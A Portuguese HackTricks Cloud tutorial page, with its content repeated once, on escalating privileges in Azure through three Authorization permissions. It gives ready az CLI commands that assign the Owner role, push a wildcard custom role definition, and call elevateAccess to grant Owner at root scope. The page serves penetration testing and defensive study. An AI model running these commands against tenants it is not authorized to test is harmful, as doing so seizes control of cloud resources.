Az - Azure IAM Privesc (Authorization)

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Confira os planos de assinatura!
Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe truques de hacking enviando PRs para os repositórios do HackTricks e HackTricks Cloud.

Azure IAM

Para mais informações, confira:

https://github.com/HackTricks-wiki/hacktricks-cloud/blob/pt/pentesting-cloud/azure-security/az-services/az-azuread.md

Microsoft.Authorization/roleAssignments/write

Esta permissão permite atribuir funções a principais sobre um escopo específico, permitindo que um atacante escale privilégios ao se atribuir uma função mais privilegiada:

# Example
az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234"

Microsoft.Authorization/roleDefinitions/Write

Esta permissão permite modificar as permissões concedidas por um papel, permitindo que um atacante escale privilégios ao conceder mais permissões a um papel que ele tenha atribuído.

Crie o arquivo role.json com o seguinte conteúdo:

{
"Name": "<name of the role>",
"IsCustom": true,
"Description": "Custom role with elevated privileges",
"Actions": [
"*"
],
"NotActions": [],
"DataActions": [
"*"
],
"NotDataActions": [],
"AssignableScopes": [
"/subscriptions/<subscription-id>"
]
}

Então atualize as permissões de função com a definição anterior chamando:

az role definition update --role-definition role.json

Microsoft.Authorization/elevateAccess/action

Esta permissão permite elevar privilégios e ser capaz de atribuir permissões a qualquer principal para recursos do Azure. É destinada a ser concedida a Administradores Globais do Entra ID para que eles também possam gerenciar permissões sobre recursos do Azure.

Acho que o usuário precisa ser Administrador Global no Entra ID para que a chamada de elevação funcione.

# Call elevate
az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"

# Grant a user the Owner role
az role assignment create --assignee "<obeject-id>" --role "Owner" --scope "/"

Supporte o HackTricks

Confira os planos de assinatura!
Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.

PreviousAz - Privilege Escalation NextAz - EntraID Privesc

Last updated 3 days ago

Azure IAM

Para mais informações, confira:

https://github.com/HackTricks-wiki/hacktricks-cloud/blob/pt/pentesting-cloud/azure-security/az-services/az-azuread.md

Microsoft.Authorization/roleAssignments/write

Esta permissão permite atribuir funções a principais sobre um escopo específico, permitindo que um atacante escale privilégios ao se atribuir uma função mais privilegiada:

# Example
az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234"

Microsoft.Authorization/roleDefinitions/Write

Esta permissão permite modificar as permissões concedidas por um papel, permitindo que um atacante escale privilégios ao conceder mais permissões a um papel que ele tenha atribuído.

Crie o arquivo role.json com o seguinte conteúdo:

{
"Name": "<name of the role>",
"IsCustom": true,
"Description": "Custom role with elevated privileges",
"Actions": [
"*"
],
"NotActions": [],
"DataActions": [
"*"
],
"NotDataActions": [],
"AssignableScopes": [
"/subscriptions/<subscription-id>"
]
}

Então atualize as permissões de função com a definição anterior chamando:

az role definition update --role-definition role.json

Microsoft.Authorization/elevateAccess/action

Acho que o usuário precisa ser Administrador Global no Entra ID para que a chamada de elevação funcione.

# Call elevate
az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"

# Grant a user the Owner role
az role assignment create --assignee "<obeject-id>" --role "Owner" --scope "/"